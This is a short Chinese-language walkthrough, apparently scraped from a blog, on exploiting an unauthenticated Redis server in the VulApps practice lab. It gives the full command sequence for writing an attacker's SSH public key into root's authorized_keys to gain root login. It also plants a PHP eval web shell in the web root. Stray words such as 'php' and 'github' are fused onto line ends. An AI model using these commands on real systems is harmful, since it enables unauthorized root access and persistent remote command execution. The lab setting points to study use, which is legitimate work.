漏洞靶場:https://github.com/Medicean/VulApps/tree/master/r/redis/1 鏈接工具:https://redis.io/download
使用redis-cli嘗試鏈接目標6379端口 #./redis-cli -h 192.168.233.131 -p 6379 //6379爲默認端口,這裏映射爲32773,若是存在弱口令,能夠經過參數-a [password]鏈接
此時能夠看到已鏈接成功
php
一、在本地/root/.ssh目錄下生成rsa密鑰對 //id_rsa私鑰,鏈接時用;id_rsa.pub公鑰,上傳內容至目標服務器html
二、經過redis命令,將公鑰寫入到目標服務器git
> config set dir /root/.ssh/ //指定存放路徑 > config set dbfilename "authorized_keys" //指定上傳的文件名 > set authorized_keys "公鑰內容" //將公鑰寫入到文件中,可略過這條命令 > save //保存
三、使用ssh命令鏈接目標github
# ssh root@192.168.233.131 -p 32774 -i ~/.ssh/id_rsa //-i 指定私鑰文件 ,這裏提示須要密碼的緣由應該是authorized_keys文件權限太低(chmod 700 authorized_keys)
> config set dir /var/www/html/ > config set dbfilename "1.php" > set 1 "<?php eval($_POST[cmd]);?>" > save